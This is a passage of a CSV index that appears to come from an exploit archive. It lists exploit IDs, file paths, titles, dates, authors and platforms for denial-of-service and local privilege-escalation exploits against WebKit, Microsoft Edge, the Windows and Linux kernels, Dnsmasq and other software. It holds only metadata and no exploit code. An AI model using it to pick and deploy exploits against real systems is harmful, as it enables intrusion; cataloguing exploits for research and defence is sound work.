Overflow",2017-06-26,defensecode,multiple,dos, -42264,exploits/windows/dos/42264.txt,"Microsoft MsMpEng - mpengine x86 Emulator Heap Corruption in VFS API",2017-06-27,"Google Security Research",windows,dos, -42272,exploits/netbsd_x86/dos/42272.c,"NetBSD - 'Stack Clash' (PoC)",2017-06-28,"Qualys Corporation",netbsd_x86,dos, -42277,exploits/freebsd_x86/dos/42277.c,"FreeBSD - 'FGPU' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",freebsd_x86,dos, -42278,exploits/freebsd_x86/dos/42278.c,"FreeBSD - 'FGPE' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",freebsd_x86,dos, -42279,exploits/freebsd_x86/dos/42279.c,"FreeBSD - 'setrlimit' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",freebsd_x86,dos, -42285,exploits/android/dos/42285.txt,"LG MRA58K - 'ASFParser::SetMetaData' Stack Overflow",2017-06-30,"Google Security Research",android,dos, -42286,exploits/multiple/dos/42286.txt,"Google Chrome - Out-of-Bounds Access in RegExp Stubs",2017-06-30,"Google Security Research",multiple,dos, -42294,exploits/multiple/dos/42294.py,"Zookeeper 3.5.2 Client - Denial of Service",2017-07-02,"Brandon Dennis",multiple,dos,2181 -42299,exploits/linux/dos/42299.txt,"LibTIFF - 'tif_dirwrite.c' Denial of Service",2017-07-06,"team OWL337",linux,dos, -42300,exploits/linux/dos/42300.txt,"LibTIFF - 'tif_jbig.c' Denial of Service",2017-07-06,"team OWL337",linux,dos, -42301,exploits/linux/dos/42301.txt,"LibTIFF - '_TIFFVGetField (tiffsplit)' Out-of-Bounds Read",2017-07-06,zhangtan,linux,dos, -42302,exploits/windows/dos/42302.txt,"Firefox 54.0.1 - Denial of Service",2017-07-07,hyp3rlinx,windows,dos, -42336,exploits/windows/dos/42336.html,"Microsoft Internet Explorer 11.0.9600.18617 - 'CMarkup::DestroySplayTree' Memory Corruption",2017-07-18,"Google Security Research",windows,dos, -42337,exploits/windows/dos/42337.html,"Microsoft Internet Explorer 11.1066.14393.0 - VBScript Arithmetic Functions Type Confusion",2017-07-18,"Google Security Research",windows,dos, -42338,exploits/windows/dos/42338.cpp,"Microsoft Windows Kernel - 'IOCTL 0x120007 NsiGetParameter' nsiproxy/netio Pool Memory Disclosure",2017-07-18,"Google Security Research",windows,dos, -42360,exploits/multiple/dos/42360.html,"WebKit - 'WebCore::AccessibilityNodeObject::textUnderElement' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos, -42361,exploits/multiple/dos/42361.html,"WebKit - 'WebCore::AccessibilityRenderObject::handleAriaExpandedChanged' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos, -42362,exploits/multiple/dos/42362.html,"WebKit - 'WebCore::Node::nextSibling' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos, -42363,exploits/multiple/dos/42363.html,"WebKit - 'WebCore::RenderSearchField::addSearchResult' Heap Buffer Overflow",2017-07-24,"Google Security Research",multiple,dos, -42364,exploits/multiple/dos/42364.html,"WebKit - 'WebCore::InputType::element' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos, -42365,exploits/multiple/dos/42365.html,"WebKit - 'WebCore::RenderObject' with Accessibility Enabled Use-After-Free",2017-07-24,"Google Security Research",multiple,dos, -42366,exploits/multiple/dos/42366.html,"WebKit - 'WebCore::Node::getFlag' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos, -42367,exploits/multiple/dos/42367.html,"WebKit - 'WebCore::getCachedWrapper' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos, -42373,exploits/multiple/dos/42373.html,"WebKit JSC - 'DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry)' Incorrect Scope Register Handling",2017-07-25,"Google Security Research",multiple,dos, -42374,exploits/multiple/dos/42374.html,"WebKit JSC - 'arrayProtoFuncSplice' Uninitialized Memory Reference",2017-07-25,"Google Security Research",multiple,dos, -42375,exploits/multiple/dos/42375.html,"WebKit JSC - 'JSArray::appendMemcpy' Uninitialized Memory Copy",2017-07-25,"Google Security Research",multiple,dos, -42376,exploits/multiple/dos/42376.html,"WebKit JSC - 'ArgumentsEliminationPhase::transform' Incorrect LoadVarargs Handling",2017-07-25,"Google Security Research",multiple,dos, -42377,exploits/multiple/dos/42377.txt,"WebKit JSC - 'ObjectPatternNode::appendEntry' Stack Use-After-Free",2017-07-25,"Google Security Research",multiple,dos, -42386,exploits/linux/dos/42386.txt,"GNU libiberty - Buffer Overflow",2017-07-27,"Marcel Böhme",linux,dos, -42389,exploits/linux/dos/42389.txt,"SoundTouch 1.9.2 - Multiple Vulnerabilities",2017-07-28,qflb.wu,linux,dos, -42390,exploits/linux/dos/42390.txt,"LAME 3.99.5 - Multiple Vulnerabilities",2017-07-28,qflb.wu,linux,dos, -42391,exploits/linux/dos/42391.txt,"libjpeg-turbo 1.5.1 - Denial of Service",2017-07-28,qflb.wu,linux,dos, -42396,exploits/linux/dos/42396.txt,"DivFix++ 0.34 - Denial of Service",2017-07-31,qflb.wu,linux,dos, -42397,exploits/linux/dos/42397.txt,"Vorbis Tools oggenc 1.4.0 - '.wav' Denial of Service",2017-07-31,qflb.wu,linux,dos, -42398,exploits/linux/dos/42398.txt,"Sound eXchange (SoX) 14.4.2 - Multiple Vulnerabilities",2017-07-31,qflb.wu,linux,dos, -42399,exploits/linux/dos/42399.txt,"libvorbis 1.3.5 - Multiple Vulnerabilities",2017-07-31,qflb.wu,linux,dos, -42400,exploits/linux/dos/42400.txt,"libao 1.2.0 - Denial of Service",2017-07-31,qflb.wu,linux,dos, -42409,exploits/linux/dos/42409.txt,"libmad 0.15.1b - 'mp3' Memory Corruption",2017-08-01,qflb.wu,linux,dos, -42411,exploits/windows/dos/42411.py,"Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service",2017-08-01,"Guillaume Kaddouch",windows,dos, -42433,exploits/linux/dos/42433.txt,"WildMIDI 0.4.2 - Multiple Vulnerabilities",2017-08-08,qflb.wu,linux,dos, -42445,exploits/win_x86-64/dos/42445.html,"Microsoft Edge 38.14393.1066.0 - 'textarea.defaultValue' Memory Disclosure",2017-08-10,"Google Security Research",win_x86-64,dos, -42451,exploits/windows/dos/42451.py,"Tomabo MP4 Converter 3.19.15 - Denial of Service",2017-08-13,"Andy Bowden",windows,dos, -42464,exploits/windows/dos/42464.html,"Microsoft Edge Chakra - 'PreVisitCatch' Missing Call",2017-08-17,"Google Security Research",windows,dos, -42465,exploits/windows/dos/42465.html,"Microsoft Edge Chakra - 'chakra!Js::GlobalObject' Integer overflow",2017-08-17,"Huang Anwen",windows,dos, -42466,exploits/windows/dos/42466.html,"Microsoft Edge Chakra - Buffer Overflow",2017-08-17,"Huang Anwen",windows,dos, -42467,exploits/windows/dos/42467.html,"Microsoft Edge Chakra - NULL Pointer Dereference",2017-08-17,"Huang Anwen",windows,dos, -42468,exploits/windows/dos/42468.html,"Microsoft Edge Chakra - Heap Buffer Overflow",2017-08-17,"Huang Anwen",windows,dos, -42469,exploits/windows/dos/42469.html,"Microsoft Edge Chakra - 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule' Incorrectly Re-parses",2017-08-17,"Google Security Research",windows,dos, -42470,exploits/windows/dos/42470.html,"Microsoft Edge Chakra - 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule' Incorrect Usage of 'PushPopFrameHelper' (Denial of Service)",2017-08-17,"Google Security Research",windows,dos, -42471,exploits/windows/dos/42471.html,"Microsoft Edge Chakra - 'TryUndeleteProperty' Incorrect Usage (Denial of Service)",2017-08-17,"Google Security Research",windows,dos, -42472,exploits/windows/dos/42472.html,"Microsoft Edge Chakra - 'EmitAssignment' uses the 'this' Register Without Initializing",2017-08-17,"Google Security Research",windows,dos, -42473,exploits/windows/dos/42473.html,"Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter #2",2017-08-17,"Google Security Research",windows,dos, -42474,exploits/windows/dos/42474.html,"Microsoft Edge Chakra - 'JavascriptArray::ConcatArgs' Type Confusion",2017-08-17,"Google Security Research",windows,dos, -42475,exploits/windows/dos/42475.html,"Microsoft Edge Chakra - 'JavascriptFunction::EntryCall' Fails to Handle 'CallInfo' Properly",2017-08-17,"Google Security Research",windows,dos, -42476,exploits/windows/dos/42476.html,"Microsoft Edge Chakra - Uninitialized Arguments (1)",2017-08-17,"Google Security Research",windows,dos, -42477,exploits/windows/dos/42477.html,"Microsoft Edge Chakra - Uninitialized Arguments (2)",2017-08-17,"Google Security Research",windows,dos, -42478,exploits/windows/dos/42478.html,"Microsoft Edge Chakra - 'EmitNew' Integer Overflow",2017-08-17,"Google Security Research",windows,dos, -42479,exploits/windows/dos/42479.html,"Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter #3",2017-08-17,"Google Security Research",windows,dos, -42480,exploits/windows/dos/42480.txt,"Adobe Flash - Invoke Accesses Trait Out-of-Bounds",2017-08-17,"Google Security Research",windows,dos, -42481,exploits/windows/dos/42481.js,"Microsoft Edge - Out-of-Bounds Access when Fetching Source",2017-08-17,"Google Security Research",windows,dos, -42483,exploits/windows/dos/42483.py,"MyDoomScanner 1.00 - Local Buffer Overflow (PoC)",2017-08-17,"Anurag Srivastava",windows,dos, -42486,exploits/windows/dos/42486.py,"DSScan 1.0 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",windows,dos, -42495,exploits/windows/dos/42495.py,"MessengerScan 1.05 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",windows,dos, -42546,exploits/linux/dos/42546.txt,"libgig 4.0.0 (LinuxSampler) - Multiple Vulnerabilities",2017-08-23,qflb.wu,linux,dos, -42518,exploits/hardware/dos/42518.txt,"NoviFlow NoviWare < NW400.2.6 - Multiple Vulnerabilities",2017-08-18,"François Goichon",hardware,dos, -42600,exploits/linux/dos/42600.txt,"OpenJPEG - 'mqc.c' Heap-Based Buffer Overflow",2017-09-01,"Ke Liu",linux,dos, -42602,exploits/multiple/dos/42602.html,"IBM Notes 8.5.x/9.0.x - Denial of Service",2017-09-02,"Dhiraj Mishra",multiple,dos, -42652,exploits/linux/dos/42652.txt,"tcprewrite - Heap-Based Buffer Overflow",2017-09-11,FarazPajohan,linux,dos, -42666,exploits/multiple/dos/42666.txt,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (1)",2017-09-12,"Google Security Research",multiple,dos, -42747,exploits/windows/dos/42747.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetFontResourceInfoInternalW' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos, -42741,exploits/windows/dos/42741.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetGlyphOutline' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos, -42742,exploits/windows/dos/42742.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos, -42743,exploits/windows/dos/42743.cpp,"Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos, -42744,exploits/windows/dos/42744.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table 'win32k!bGeneratePath' (Denial of Service)",2017-09-18,"Google Security Research",windows,dos, -42746,exploits/windows/dos/42746.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table 'win32k!fsc_CalcGrayRow' (Denial of Service)",2017-09-18,"Google Security Research",windows,dos, -42748,exploits/windows/dos/42748.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos, -42749,exploits/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos, -42758,exploits/windows/dos/42758.txt,"Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading",2017-09-19,"Google Security Research",windows,dos, -42759,exploits/windows/dos/42759.html,"Microsoft Edge 38.14393.1066.0 - 'COptionsCollectionCacheItem::GetAt' Out-of-Bounds Read",2017-09-19,"Google Security Research",windows,dos, -42762,exploits/linux/dos/42762.txt,"Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC)",2017-09-21,"Marcin Kozlowski",linux,dos, -42763,exploits/windows/dos/42763.html,"Microsoft Edge - Chakra Incorrectly Parses Object Patterns",2017-09-21,"Google Security Research",windows,dos, -42764,exploits/windows/dos/42764.html,"Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes",2017-09-21,"Google Security Research",windows,dos, -42765,exploits/windows/dos/42765.html,"Microsoft Edge Chakra - 'Parser::ParseCatch' Does Not Handle 'eval()' (Denial of Service)",2017-09-21,"Google Security Research",windows,dos, -42766,exploits/windows/dos/42766.html,"Microsoft Edge Chakra - 'JavascriptFunction::ReparseAsmJsModule' Incorrectly Re-parses",2017-09-21,"Google Security Research",windows,dos, -42781,exploits/multiple/dos/42781.txt,"Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing",2017-09-25,"Google Security Research",multiple,dos, -42782,exploits/multiple/dos/42782.txt,"Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing",2017-09-25,"Google Security Research",multiple,dos, -42783,exploits/multiple/dos/42783.txt,"Adobe Flash - Out-of-Bounds Read in applyToRange",2017-09-25,"Google Security Research",multiple,dos, -42917,exploits/windows/dos/42917.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)",2017-09-28,"Touhid M.Shaikh",windows,dos, -42920,exploits/windows/dos/42920.py,"Trend Micro OfficeScan 11.0/XG (12.0) - Memory Corruption",2017-09-29,hyp3rlinx,windows,dos, -42932,exploits/linux/dos/42932.c,"Linux Kernel < 4.14.rc3 - Local Denial of Service",2017-10-02,"Wang Chenyu",linux,dos, -42941,exploits/multiple/dos/42941.py,"Dnsmasq < 2.78 - 2-byte Heap-Based Overflow",2017-10-02,"Google Security Research",multiple,dos, -42942,exploits/multiple/dos/42942.py,"Dnsmasq < 2.78 - Heap-Based Overflow",2017-10-02,"Google Security Research",multiple,dos, -42943,exploits/multiple/dos/42943.py,"Dnsmasq < 2.78 - Stack-Based Overflow",2017-10-02,"Google Security Research",multiple,dos, -42944,exploits/multiple/dos/42944.py,"Dnsmasq < 2.78 - Information Leak",2017-10-02,"Google Security Research",multiple,dos, -42945,exploits/multiple/dos/42945.py,"Dnsmasq < 2.78 - Lack of free() Denial of Service",2017-10-02,"Google Security Research",multiple,dos, -42946,exploits/multiple/dos/42946.py,"Dnsmasq < 2.78 - Integer Underflow",2017-10-02,"Google Security Research",multiple,dos, -42955,exploits/multiple/dos/42955.html,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)",2017-10-04,"Google Security Research",multiple,dos, -42970,exploits/linux/dos/42970.txt,"binutils 2.29.51.20170921 - 'read_1_byte' Heap-Based Buffer Overflow",2017-10-10,"Agostino Sarubbo",linux,dos, -42962,exploits/windows/dos/42962.py,"PyroBatchFTP 3.17 - Buffer Overflow (SEH)",2017-10-07,"Kevin McGuigan",windows,dos, -42969,exploits/multiple/dos/42969.rb,"IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)",2017-08-31,"Dhiraj Mishra",multiple,dos, -42994,exploits/windows/dos/42994.txt,"Microsoft Office Groove - 'Workspace Shortcut' Arbitrary Code Execution",2017-09-28,"Eduardo Braun Prado",windows,dos, -42995,exploits/windows/dos/42995.txt,"Microsoft Excel - OLE Arbitrary Code Execution",2017-09-30,"Eduardo Braun Prado",windows,dos, -42997,exploits/windows/dos/42997.txt,"Microsoft Windows 10 - WLDP/MSHTML CLSID UMCI Bypass",2017-10-17,"Google Security Research",windows,dos, -42998,exploits/windows/dos/42998.js,"Microsoft Edge Chakra JIT - Incorrect GenerateBailOut Calling Patterns",2017-10-17,"Google Security Research",windows,dos, -42999,exploits/windows/dos/42999.js,"Microsoft Edge Chakra - 'StackScriptFunction::BoxState::Box' Accesses to Uninitialized Pointers (Denial of Service)",2017-10-17,"Google Security Research",windows,dos, -43000,exploits/windows/dos/43000.js,"Microsoft Edge Chakra JIT - 'RegexHelper::StringReplace' Must Call the Callback Function with Updating ImplicitCallFlags",2017-10-17,"Google Security Research",windows,dos, -43001,exploits/windows/dos/43001.cpp,"Microsoft Windows - 'nt!NtQueryObject (ObjectNameInformation)' Kernel Pool Memory Disclosure",2017-10-17,"Google Security Research",windows,dos, -43010,exploits/linux/dos/43010.c,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,linux,dos, -43107,exploits/ios/dos/43107.py,"WhatsApp 2.17.52 - Memory Corruption",2017-11-01,"Juan Sacco",ios,dos, -43014,exploits/linux/dos/43014.txt,"Xen - Pagetable De-typing Unbounded Recursion",2017-10-18,"Google Security Research",linux,dos, -43020,exploits/multiple/dos/43020.txt,"Mozilla Firefox < 55 - Denial of Service",2017-10-20,"Amit Sangra",multiple,dos, -43026,exploits/windows/dos/43026.py,"ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service",2017-10-21,"Berk Cem Göksel",windows,dos, -43058,exploits/windows/dos/43058.c,"Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference",2017-10-26,"Parvez Anwar",windows,dos, -43060,exploits/windows/dos/43060.py,"Tizen Studio 1.3 Smart Development Bridge < 2.3.2 - Buffer Overflow (PoC)",2017-10-27,"Marcin Kopec",windows,dos, -43111,exploits/multiple/dos/43111.py,"GraphicsMagick - Memory Disclosure / Heap Overflow",2017-11-03,SecuriTeam,multiple,dos, -43115,exploits/windows/dos/43115.py,"Ipswitch WS_FTP Professional < 12.6.0.3 - Local Buffer Overflow (SEH)",2017-11-03,"Kevin McGuigan",windows,dos, -43119,exploits/hardware/dos/43119.py,"Debut Embedded httpd 1.20 - Denial of Service",2017-11-02,z00n,hardware,dos, -43120,exploits/windows/dos/43120.txt,"Avaya IP Office (IPO) < 10.1 - ActiveX Buffer Overflow",2017-11-05,hyp3rlinx,windows,dos, -43124,exploits/windows/dos/43124.py,"SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)",2017-11-05,bzyo,windows,dos, -43131,exploits/windows/dos/43131.html,"Microsoft Internet Explorer 11 - 'jscript!JsErrorToString' Use-After-Free",2017-11-09,"Google Security Research",windows,dos, -43133,exploits/multiple/dos/43133.php,"PHP 7.1.8 - Heap-Based Buffer Overflow",2017-11-09,"Wei Lei and Liu Yang",multiple,dos, -43135,exploits/windows/dos/43135.py,"Xlight FTP Server 3.8.8.5 - Buffer Overflow (PoC)",2017-11-07,bzyo,windows,dos, -43144,exploits/windows/dos/43144.txt,"PSFTPd Windows FTP Server 10.0.4 Build 729 - Log Injection / Use-After-Free",2017-11-14,"X41 D-Sec GmbH",windows,dos, -43152,exploits/windows/dos/43152.js,"Microsoft Edge Chakra JIT - Type Confusion with switch Statements",2017-11-16,"Google Security Research",windows,dos, -43154,exploits/windows/dos/43154.js,"Microsoft Edge Chakra: JIT - 'OP_Memset' Type Confusion",2017-11-16,"Google Security Research",windows,dos, -43161,exploits/ios/dos/43161.py,"iOS < 11.1 / tvOS < 11.1 / watchOS < 4.1 - Denial of Service",2017-11-20,"Russian Otter",ios,dos, -43164,exploits/hardware/dos/43164.py,"Vonage VDV-23 - Denial of Service",2017-11-21,Nu11By73,hardware,dos, -43165,exploits/windows/dos/43165.cpp,"Microsoft Windows 10 - 'nt!NtQueryDirectoryFile (luafv!LuafvCopyDirectoryEntry)' Pool Memory Disclosure",2017-11-21,"Google Security Research",windows,dos, -43166,exploits/multiple/dos/43166.js,"WebKit - 'WebCore::TreeScope::documentScope' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos, -43167,exploits/multiple/dos/43167.js,"WebKit - 'WebCore::InputType::element' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos, -43168,exploits/multiple/dos/43168.js,"WebKit - 'WebCore::PositionIterator::decrement' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos, -43169,exploits/multiple/dos/43169.js,"WebKit - 'WebCore::AXObjectCache::performDeferredCacheUpdate' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos, -43170,exploits/multiple/dos/43170.js,"WebKit - 'WebCore::RenderText::localCaretRect' Out-of-Bounds Read",2017-11-22,"Google Security Research",multiple,dos, -43171,exploits/multiple/dos/43171.js,"WebKit - 'WebCore::SimpleLineLayout::RunResolver::runForPoint' Out-of-Bounds Read",2017-11-22,"Google Security Research",multiple,dos, -43172,exploits/multiple/dos/43172.js,"WebKit - 'WebCore::SVGPatternElement::collectPatternAttributes' Out-of-Bounds Read",2017-11-22,"Google Security Research",multiple,dos, -43173,exploits/multiple/dos/43173.html,"WebKit - 'WebCore::Style::TreeResolver::styleForElement' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos, -43174,exploits/multiple/dos/43174.html,"WebKit - 'WebCore::DocumentLoader::frameLoader' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos, -43175,exploits/multiple/dos/43175.html,"WebKit - 'WebCore::RenderObject::previousSibling' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos, -43176,exploits/multiple/dos/43176.html,"WebKit - 'WebCore::FormSubmission::create' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos, -43178,exploits/linux/dos/43178.c,"Linux - 'mincore()' Uninitialized Kernel Heap Page Disclosure",2017-11-24,"Google Security Research",linux,dos, -3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local, -4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,solaris,local, -12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local, -15,exploits/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService 'PATH' Local Privilege Escalation",2003-04-18,"Neeko Oni",osx,local, -21,exploits/linux/local/21.c,"Qpopper 4.0.x - poppassd Privilege Escalation",2003-04-29,Xpl017Elz,linux,local, -29,exploits/bsd/local/29.c,"Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Local Privilege Escalation",2003-05-12,bob,bsd,local, -31,exploits/linux/local/31.pl,"CDRTools CDRecord 2.0 (Mandrake / Slackware) - Local Privilege Escalation",2003-05-14,anonymous,linux,local, -32,exploits/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Local Buffer Overflow",2003-05-21,einstein,windows,local, -40,exploits/linux/local/40.pl,"Mandrake Linux 8.2 - '/usr/mail' Local Overflow",2003-06-10,anonymous,linux,local, -52,exploits/windows/local/52.asm,"ICQ Pro 2003a - 'ca1-icq.asm' Password Bypass",2003-07-09,"Caua Moura Prado",windows,local, -71,exploits/linux/local/71.c,"XGalaga 2.0.34 (RedHat 9.0) - Local Game",2003-07-31,c0wboy,linux,local, -72,exploits/linux/local/72.c,"xtokkaetama 1.0b (RedHat 9.0) - Local Game",2003-08-01,brahma,linux,local, -75,exploits/linux/local/75.c,"man-db 2.4.1 - 'open_cat_stream()' Local uid=man",2003-08-06,vade79,linux,local, -79,exploits/windows/local/79.c,"DameWare Mini Remote Control Server - System",2003-08-13,ash,windows,local, -91,exploits/linux/local/91.c,"Stunnel 3.24/4.00 - Daemon Hijacking (PoC)",2003-09-05,"Steve Grubb",linux,local, -93,exploits/linux/local/93.c,"RealPlayer 9 *nix - Local Privilege Escalation",2003-09-09,"Jon Hart",linux,local, -104,exploits/linux/local/104.c,"hztty 2.0 (RedHat 9.0) - Local Privilege Escalation",2003-09-21,c0wboy,linux,local, -106,exploits/linux/local/106.c,"IBM DB2 - Universal Database 7.2 'db2licm' Local Overflow",2003-09-27,"Juan Escriba",linux,local, -114,exploits/solaris/local/114.c,"Solaris Runtime Linker (SPARC) - 'ld.so.1' Local Buffer Overflow",2003-10-27,osker178,solaris,local, -118,exploits/bsd/local/118.c,"OpenBSD - 'ibcs2_exec' Kernel Code Execution",2003-11-07,"Scott Bartram",bsd,local, -120,exploits/linux/local/120.c,"TerminatorX 3.81 - Local Stack Overflow / Privilege Escalation",2003-11-13,Li0n7,linux,local, -122,exploits/windows/local/122.c,"Microsoft Windows - ListBox/ComboBox Control Local (MS03-045)",2003-11-14,xCrZx,windows,local, -125,exploits/bsd/local/125.c,"OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow",2003-11-19,"Sinan Eren",bsd,local, -129,exploits/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (PoC)",2003-12-02,"Christophe Devine",linux,local, -131,exploits/linux/local/131.c,"Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation",2003-12-05,"Wojciech Purczynski",linux,local, -134,exploits/hp-ux/local/134.c,"HP-UX B11.11 - '/usr/bin/ct' Format String Privilege Escalation",2003-12-16,watercloud,hp-ux,local, -140,exploits/linux/local/140.c,"XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game",2004-01-02,c0wboy,linux,local, -141,exploits/linux/local/141.c,"Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1)",2004-01-06,"Christophe Devine",linux,local, -142,exploits/linux/local/142.c,"Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2)",2004-01-07,"Christophe Devine",linux,local, -144,exploits/linux/local/144.c,"SuSE Linux 9.0 - YaST Configuration Skribt Overwrite Files",2004-01-15,l0om,linux,local, -145,exploits/linux/local/145.c,"Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation",2004-01-15,"Paul Starzetz",linux,local, -152,exploits/linux/local/152.c,"rsync 2.5.7 - Local Stack Overflow / Local Privilege Escalation",2004-02-13,"Abhisek Datta",linux,local, -154,exploits/linux/local/154.c,"Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator (PoC)",2004-02-18,"Christophe Devine",linux,local, -160,exploits/linux/local/160.c,"Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Local Privilege Escalation",2004-03-01,"Paul Starzetz",linux,local, -172,exploits/windows/local/172.c,"FirstClass Desktop 7.1 - Local Buffer Overflow",2004-04-07,I2S-LaB,windows,local, -178,exploits/linux/local/178.c,"LBL Traceroute - Local Privilege Escalation",2000-11-15,"Michel Kaempf",linux,local, -180,exploits/linux/local/180.c,"GnomeHack 1.0.5 - Local Buffer Overflow",2000-11-15,vade79,linux,local, -182,exploits/linux/local/182.sh,"RedHat 6.2 - '/sbin/restore' Local Privilege Escalation",2000-11-16,anonymous,linux,local, -183,exploits/linux/local/183.c,"Oracle (oidldapd connect) - Local Command Line Overflow",2000-11-16,anonymous,linux,local, -184,exploits/linux/local/184.pl,"RedHat 6.2 Restore and Dump - Local Privilege Escalation (Perl)",2000-11-16,Tlabs,linux,local, -186,exploits/linux/local/186.pl,"xsplumber - 'strcpy()' Local Buffer Overflow",2000-11-17,vade79,linux,local, -193,exploits/linux/local/193.sh,"dump 0.4b15 - Local Privilege Escalation",2000-11-19,mat,linux,local, -197,exploits/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 locale - Format String",2000-11-20,"Solar Eclipse",solaris,local, -199,exploits/hp-ux/local/199.c,"HP-UX 11.0 - pppd Stack Buffer Overflow",2000-11-20,K2,hp-ux,local, -200,exploits/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,bsd,local, -202,exploits/bsd/local/202.c,"BSDi 3.0/4.0 - 'rcvtty[mh]' Local Privilege Escalation",2000-11-21,vade79,bsd,local, -203,exploits/linux/local/203.sh,"vixie-cron - Local Privilege Escalation",2000-11-21,"Michal Zalewski",linux,local, -205,exploits/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - 'SUID' Local Privilege Escalation",2000-11-29,Tlabs,linux,local, -206,exploits/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Local Privilege Escalation",2000-11-29,mat,linux,local, -207,exploits/bsd/local/207.c,"BSDi 3.0 inc - Local Buffer Overflow / Privilege Escalation",2000-11-30,vade79,bsd,local, -209,exploits/linux/local/209.c,"GLIBC - '/bin/su' Local Privilege Escalation",2000-11-30,localcore,linux,local, -210,exploits/solaris/local/210.c,"Solaris 2.6/7.0 - 'locale' Format Strings noexec stack Overflow",2000-11-30,warning3,solaris,local, -215,exploits/linux/local/215.c,"GLIBC locale - bug mount",2000-12-02,sk8,linux,local, -216,exploits/linux/local/216.c,"dislocate 1.3 - Local i386",2000-12-02,"Michel Kaempf",linux,local, -217,exploits/linux/local/217.c,"UUCP - File Creation/Overwriting Symlinks",2000-12-04,t--zen,linux,local, -218,exploits/linux/local/218.c,"expect (/usr/bin/expect) - Local Buffer Overflow",2000-12-04,isox,linux,local, -219,exploits/linux/local/219.c,"GnomeHack - Local Buffer Overflow",2000-12-04,"Cody Tubbs",linux,local, -221,exploits/linux/local/221.c,"Kwintv - Local Buffer Overflow",2000-12-06,"Cody Tubbs",linux,local, -222,exploits/linux/local/222.c,"gnome_segv - Local Buffer Overflow",2000-12-06,"Cody Tubbs",linux,local, -229,exploits/linux/local/229.c,"xsoldier 0.96 (RedHat 6.2) - Local Buffer Overflow",2000-12-15,zorgon,linux,local, -231,exploits/linux/local/231.sh,"Pine (Local Message Grabber) - Local Message Read",2000-12-15,mat,linux,local, -243,exploits/bsd/local/243.c,"BSD chpass - 'pw_error(3)' Local 